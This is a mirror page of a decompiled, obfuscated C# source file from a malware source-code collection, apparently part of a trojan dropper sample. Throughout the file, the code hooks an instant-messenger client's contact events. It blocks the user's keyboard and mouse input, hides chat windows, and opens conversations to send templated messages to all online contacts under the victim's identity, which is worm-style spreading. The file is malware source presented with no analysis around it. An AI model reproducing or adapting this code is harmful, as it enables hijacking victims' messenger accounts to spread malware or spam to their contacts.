mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
343 lines
14 KiB
C#
343 lines
14 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0003;
|
|||
|
using \u0006;
|
|||
|
using System;
|
|||
|
using System.Collections.Generic;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text.RegularExpressions;
|
|||
|
using System.Threading;
|
|||
|
using System.Windows.Forms;
|
|||
|
|
|||
|
namespace \u000E
|
|||
|
{
|
|||
|
internal sealed class \u0006
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0001.\u0002 \u0001;
|
|||
|
public static string[] \u0001;
|
|||
|
public static string[] \u0002;
|
|||
|
public static bool \u0001;
|
|||
|
public static string \u0001;
|
|||
|
|
|||
|
[DllImport("user32.dll", EntryPoint = "BlockInput", CharSet = CharSet.Auto)]
|
|||
|
private static extern bool \u000F([MarshalAs(UnmanagedType.Bool), In] bool fBlockIt);
|
|||
|
|
|||
|
[DllImport("user32.dll", EntryPoint = "PostMessage", SetLastError = true)]
|
|||
|
private static extern bool \u000F([In] IntPtr obj0, [In] uint obj1, [In] IntPtr obj2, [In] IntPtr obj3);
|
|||
|
|
|||
|
[DllImport("user32.dll", EntryPoint = "FindWindowEx", SetLastError = true)]
|
|||
|
private static extern IntPtr \u000F([In] IntPtr obj0, [In] IntPtr obj1, [In] string obj2, [In] IntPtr obj3);
|
|||
|
|
|||
|
[DllImport("user32.dll", EntryPoint = "ShowWindow")]
|
|||
|
private static extern bool \u000F([In] IntPtr obj0, [In] int obj1);
|
|||
|
|
|||
|
[DllImport("user32.dll", EntryPoint = "FindWindow", SetLastError = true)]
|
|||
|
private static extern IntPtr \u000F([In] IntPtr obj0, [In] string obj1);
|
|||
|
|
|||
|
public static void \u000F([In] string[] obj0, [In] string[] obj1)
|
|||
|
{
|
|||
|
if (\u000E.\u0006.\u0001)
|
|||
|
return;
|
|||
|
if (!\u000E.\u0006.\u000F())
|
|||
|
return;
|
|||
|
try
|
|||
|
{
|
|||
|
\u000E.\u0006.\u0001 = obj0;
|
|||
|
\u000E.\u0006.\u0002 = obj1;
|
|||
|
// ISSUE: method pointer
|
|||
|
((\u0004.\u0001) new \u0008()).add_OnContactStatusChange(new \u0005((object) null, (UIntPtr) __methodptr(\u000F)));
|
|||
|
\u000E.\u0006.\u0001 = true;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static void \u000F([In] object obj0, [In] \u0002.\u0007 obj1)
|
|||
|
{
|
|||
|
\u0003.\u0006 vContact = (\u0003.\u0006) obj0;
|
|||
|
if (obj1 != \u0002.\u0007.\u0003 || vContact.IsSelf || \u000E.\u0006.\u000F(vContact.SigninName) || vContact.Blocked)
|
|||
|
return;
|
|||
|
if (\u000E.\u0006.\u0010(vContact.SigninName))
|
|||
|
return;
|
|||
|
try
|
|||
|
{
|
|||
|
\u0007.\u0004 obj = (\u0007.\u0004) new \u0008();
|
|||
|
string str1 = \u000E.\u0006.\u000F(vContact.FriendlyName);
|
|||
|
foreach (\u0003.\u0006 myContact in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
|
|||
|
{
|
|||
|
IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, \u000E.\u0006.\u000F(myContact.FriendlyName) + \u000E.\u0006.\u0001(4127) + myContact.SigninName + \u000E.\u0006.\u0001(1879));
|
|||
|
try
|
|||
|
{
|
|||
|
\u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
foreach (\u0003.\u0006 myContact in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
|
|||
|
{
|
|||
|
IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, myContact.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact.SigninName + \u000E.\u0006.\u0001(1879));
|
|||
|
try
|
|||
|
{
|
|||
|
\u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
\u000E.\u0006.\u000F(true);
|
|||
|
Thread.Sleep(1000);
|
|||
|
((\u0003.\u0004) obj).\u0002((object) vContact);
|
|||
|
IntPtr num1 = \u000E.\u0006.\u000F(IntPtr.Zero, vContact.FriendlyName + \u000E.\u0006.\u0001(4127) + vContact.SigninName + \u000E.\u0006.\u0001(1879));
|
|||
|
if (num1.ToString() == \u000E.\u0006.\u0001(1939))
|
|||
|
num1 = \u000E.\u0006.\u000F(IntPtr.Zero, str1 + \u000E.\u0006.\u0001(4127) + vContact.SigninName + \u000E.\u0006.\u0001(1879));
|
|||
|
\u000E.\u0006.\u000F(num1, 0);
|
|||
|
\u000E.\u0006.\u000F(\u000E.\u0006.\u000F(num1, IntPtr.Zero, \u000E.\u0006.\u0001(4132), IntPtr.Zero), IntPtr.Zero, \u000E.\u0006.\u0001(4153), IntPtr.Zero);
|
|||
|
string str2 = \u000E.\u0006.\u0001[\u000E.\u0006.\u000F(0, \u000E.\u0006.\u0001.Length)];
|
|||
|
string newValue = \u000E.\u0006.\u0002[\u000E.\u0006.\u000F(0, \u000E.\u0006.\u0002.Length)].Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), vContact.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), vContact.FriendlyName);
|
|||
|
SendKeys.SendWait(str2.Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), vContact.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), vContact.FriendlyName).Replace(\u000E.\u0006.\u0001(4222), newValue));
|
|||
|
SendKeys.SendWait(\u000E.\u0006.\u0001(4231));
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
for (int index = 0; index < processes.Length; ++index)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (processes[index].MainWindowTitle.Contains(vContact.SigninName))
|
|||
|
processes[index].CloseMainWindow();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
\u000E.\u0006.\u000F(false);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
\u000E.\u0006.\u000F(false);
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
private static bool \u000F([In] string obj0) => new List<string>()
|
|||
|
{
|
|||
|
\u000E.\u0006.\u0001(4244),
|
|||
|
\u000E.\u0006.\u0001(4277),
|
|||
|
\u000E.\u0006.\u0001(4306),
|
|||
|
\u000E.\u0006.\u0001(4339),
|
|||
|
\u000E.\u0006.\u0001(4368),
|
|||
|
\u000E.\u0006.\u0001(4397),
|
|||
|
\u000E.\u0006.\u0001(4426),
|
|||
|
\u000E.\u0006.\u0001(4451),
|
|||
|
\u000E.\u0006.\u0001(4484),
|
|||
|
\u000E.\u0006.\u0001(4517),
|
|||
|
\u000E.\u0006.\u0001(4554),
|
|||
|
\u000E.\u0006.\u0001(4595),
|
|||
|
\u000E.\u0006.\u0001(4620),
|
|||
|
\u000E.\u0006.\u0001(4653),
|
|||
|
\u000E.\u0006.\u0001(4686),
|
|||
|
\u000E.\u0006.\u0001(4731),
|
|||
|
\u000E.\u0006.\u0001(4768),
|
|||
|
\u000E.\u0006.\u0001(4801),
|
|||
|
\u000E.\u0006.\u0001(4838),
|
|||
|
\u000E.\u0006.\u0001(4867),
|
|||
|
\u000E.\u0006.\u0001(4900),
|
|||
|
\u000E.\u0006.\u0001(4929),
|
|||
|
\u000E.\u0006.\u0001(4958),
|
|||
|
\u000E.\u0006.\u0001(4995),
|
|||
|
\u000E.\u0006.\u0001(5032),
|
|||
|
\u000E.\u0006.\u0001(5065),
|
|||
|
\u000E.\u0006.\u0001(5094),
|
|||
|
\u000E.\u0006.\u0001(5135),
|
|||
|
\u000E.\u0006.\u0001(5168),
|
|||
|
\u000E.\u0006.\u0001(5032),
|
|||
|
\u000E.\u0006.\u0001(5201),
|
|||
|
\u000E.\u0006.\u0001(5242),
|
|||
|
\u000E.\u0006.\u0001(5283),
|
|||
|
\u000E.\u0006.\u0001(5316),
|
|||
|
\u000E.\u0006.\u0001(5337),
|
|||
|
\u000E.\u0006.\u0001(5358),
|
|||
|
\u000E.\u0006.\u0001(5383),
|
|||
|
\u000E.\u0006.\u0001(5420),
|
|||
|
\u000E.\u0006.\u0001(5453),
|
|||
|
\u000E.\u0006.\u0001(5478),
|
|||
|
\u000E.\u0006.\u0001(5507),
|
|||
|
\u000E.\u0006.\u0001(5544),
|
|||
|
\u000E.\u0006.\u0001(5573),
|
|||
|
\u000E.\u0006.\u0001(5606),
|
|||
|
\u000E.\u0006.\u0001(5639),
|
|||
|
\u000E.\u0006.\u0001(5680),
|
|||
|
\u000E.\u0006.\u0001(5705),
|
|||
|
\u000E.\u0006.\u0001(5742),
|
|||
|
\u000E.\u0006.\u0001(5775),
|
|||
|
\u000E.\u0006.\u0001(5420),
|
|||
|
\u000E.\u0006.\u0001(5804),
|
|||
|
\u000E.\u0006.\u0001(5837),
|
|||
|
\u000E.\u0006.\u0001(5862),
|
|||
|
\u000E.\u0006.\u0001(5891),
|
|||
|
\u000E.\u0006.\u0001(5928),
|
|||
|
\u000E.\u0006.\u0001(5961),
|
|||
|
\u000E.\u0006.\u0001(5994),
|
|||
|
\u000E.\u0006.\u0001(6027),
|
|||
|
\u000E.\u0006.\u0001(6072)
|
|||
|
}.Contains(obj0);
|
|||
|
|
|||
|
private static bool \u0010([In] string obj0)
|
|||
|
{
|
|||
|
foreach (string str in new List<string>()
|
|||
|
{
|
|||
|
\u000E.\u0006.\u0001(6117),
|
|||
|
\u000E.\u0006.\u0001(6126),
|
|||
|
\u000E.\u0006.\u0001(6135),
|
|||
|
\u000E.\u0006.\u0001(6156),
|
|||
|
\u000E.\u0006.\u0001(6177),
|
|||
|
\u000E.\u0006.\u0001(6198),
|
|||
|
\u000E.\u0006.\u0001(6219),
|
|||
|
\u000E.\u0006.\u0001(6244),
|
|||
|
\u000E.\u0006.\u0001(6265),
|
|||
|
\u000E.\u0006.\u0001(6286),
|
|||
|
\u000E.\u0006.\u0001(6307),
|
|||
|
\u000E.\u0006.\u0001(6328),
|
|||
|
\u000E.\u0006.\u0001(6345),
|
|||
|
\u000E.\u0006.\u0001(6362),
|
|||
|
\u000E.\u0006.\u0001(6379),
|
|||
|
\u000E.\u0006.\u0001(6396),
|
|||
|
\u000E.\u0006.\u0001(6244),
|
|||
|
\u000E.\u0006.\u0001(6265),
|
|||
|
\u000E.\u0006.\u0001(6286),
|
|||
|
\u000E.\u0006.\u0001(6328),
|
|||
|
\u000E.\u0006.\u0001(6345),
|
|||
|
\u000E.\u0006.\u0001(6345),
|
|||
|
\u000E.\u0006.\u0001(6362),
|
|||
|
\u000E.\u0006.\u0001(6417),
|
|||
|
\u000E.\u0006.\u0001(6434),
|
|||
|
\u000E.\u0006.\u0001(6459),
|
|||
|
\u000E.\u0006.\u0001(6476),
|
|||
|
\u000E.\u0006.\u0001(6521),
|
|||
|
\u000E.\u0006.\u0001(6550),
|
|||
|
\u000E.\u0006.\u0001(6571),
|
|||
|
\u000E.\u0006.\u0001(6596),
|
|||
|
\u000E.\u0006.\u0001(6621),
|
|||
|
\u000E.\u0006.\u0001(6646),
|
|||
|
\u000E.\u0006.\u0001(6667),
|
|||
|
\u000E.\u0006.\u0001(6680),
|
|||
|
\u000E.\u0006.\u0001(6689),
|
|||
|
\u000E.\u0006.\u0001(6706),
|
|||
|
\u000E.\u0006.\u0001(6727)
|
|||
|
})
|
|||
|
{
|
|||
|
if (obj0.EndsWith(str))
|
|||
|
return true;
|
|||
|
}
|
|||
|
return false;
|
|||
|
}
|
|||
|
|
|||
|
private static string \u000F([In] string obj0)
|
|||
|
{
|
|||
|
string pattern = \u000E.\u0006.\u0001(6740);
|
|||
|
return Regex.Replace(obj0, pattern, string.Empty);
|
|||
|
}
|
|||
|
|
|||
|
public static void \u000F([In] string[] obj0, [In] string[] obj1, [In] int obj2)
|
|||
|
{
|
|||
|
if (!\u000E.\u0006.\u000F())
|
|||
|
return;
|
|||
|
try
|
|||
|
{
|
|||
|
\u0007.\u0004 obj = (\u0007.\u0004) new \u0008();
|
|||
|
((\u0003.\u0004) obj).MyStatus = \u0002.\u0007.\u0004;
|
|||
|
foreach (\u0003.\u0006 myContact1 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
|
|||
|
{
|
|||
|
if (myContact1.Status != \u0002.\u0007.\u0002 && !myContact1.IsSelf && !\u000E.\u0006.\u000F(myContact1.SigninName) && !myContact1.Blocked)
|
|||
|
{
|
|||
|
if (!\u000E.\u0006.\u0010(myContact1.SigninName))
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
string str1 = \u000E.\u0006.\u000F(myContact1.FriendlyName);
|
|||
|
foreach (\u0003.\u0006 myContact2 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
|
|||
|
{
|
|||
|
IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, \u000E.\u0006.\u000F(myContact2.FriendlyName) + \u000E.\u0006.\u0001(4127) + myContact2.SigninName + \u000E.\u0006.\u0001(1879));
|
|||
|
try
|
|||
|
{
|
|||
|
\u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
foreach (\u0003.\u0006 myContact3 in (\u0003.\u0007) ((\u0003.\u0004) obj).MyContacts)
|
|||
|
{
|
|||
|
IntPtr num = \u000E.\u0006.\u000F(IntPtr.Zero, myContact3.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact3.SigninName + \u000E.\u0006.\u0001(1879));
|
|||
|
try
|
|||
|
{
|
|||
|
\u000E.\u0006.\u000F(num, 274U, (IntPtr) 61536, IntPtr.Zero);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
\u000E.\u0006.\u000F(true);
|
|||
|
Thread.Sleep(1000);
|
|||
|
((\u0003.\u0004) obj).\u0002((object) myContact1);
|
|||
|
IntPtr num1 = \u000E.\u0006.\u000F(IntPtr.Zero, myContact1.FriendlyName + \u000E.\u0006.\u0001(4127) + myContact1.SigninName + \u000E.\u0006.\u0001(1879));
|
|||
|
if (num1.ToString() == \u000E.\u0006.\u0001(1939))
|
|||
|
num1 = \u000E.\u0006.\u000F(IntPtr.Zero, str1 + \u000E.\u0006.\u0001(4127) + myContact1.SigninName + \u000E.\u0006.\u0001(1879));
|
|||
|
\u000E.\u0006.\u000F(num1, 0);
|
|||
|
\u000E.\u0006.\u000F(\u000E.\u0006.\u000F(num1, IntPtr.Zero, \u000E.\u0006.\u0001(4132), IntPtr.Zero), IntPtr.Zero, \u000E.\u0006.\u0001(4153), IntPtr.Zero);
|
|||
|
string str2 = obj0[\u000E.\u0006.\u000F(0, obj0.Length)];
|
|||
|
string newValue = obj1[\u000E.\u0006.\u000F(0, obj1.Length)].Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), myContact1.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), myContact1.FriendlyName);
|
|||
|
SendKeys.SendWait(str2.Replace(\u000E.\u0006.\u0001(4170), ((\u0003.\u0004) obj).MySigninName).Replace(\u000E.\u0006.\u0001(4183), myContact1.SigninName).Replace(\u000E.\u0006.\u0001(4196), ((\u0003.\u0004) obj).MyFriendlyName).Replace(\u000E.\u0006.\u0001(4209), myContact1.FriendlyName).Replace(\u000E.\u0006.\u0001(4222), newValue));
|
|||
|
SendKeys.SendWait(\u000E.\u0006.\u0001(4231));
|
|||
|
Process[] processes = Process.GetProcesses();
|
|||
|
for (int index = 0; index < processes.Length; ++index)
|
|||
|
{
|
|||
|
try
|
|||
|
{
|
|||
|
if (processes[index].MainWindowTitle.Contains(myContact1.SigninName))
|
|||
|
processes[index].CloseMainWindow();
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
\u000E.\u0006.\u000F(false);
|
|||
|
Thread.Sleep(obj2);
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
\u000E.\u0006.\u000F(false);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
}
|
|||
|
((\u0003.\u0004) obj).MyStatus = \u0002.\u0007.\u0003;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
\u000E.\u0006.\u000F(false);
|
|||
|
}
|
|||
|
\u000E.\u0006.\u000F(false);
|
|||
|
}
|
|||
|
|
|||
|
private static int \u000F([In] int obj0, [In] int obj1) => new Random().Next(obj0, obj1);
|
|||
|
|
|||
|
public static bool \u000F() => File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u000E.\u0006.\u0001(6753));
|
|||
|
|
|||
|
static \u0006()
|
|||
|
{
|
|||
|
\u0001.\u0003.\u000F();
|
|||
|
\u000E.\u0006.\u0001 = (string[]) null;
|
|||
|
\u000E.\u0006.\u0002 = (string[]) null;
|
|||
|
\u000E.\u0006.\u0001 = false;
|
|||
|
\u000E.\u0006.\u0001 = \u000E.\u0006.\u0001(1001);
|
|||
|
}
|
|||
|
}
|
|||
|
}
|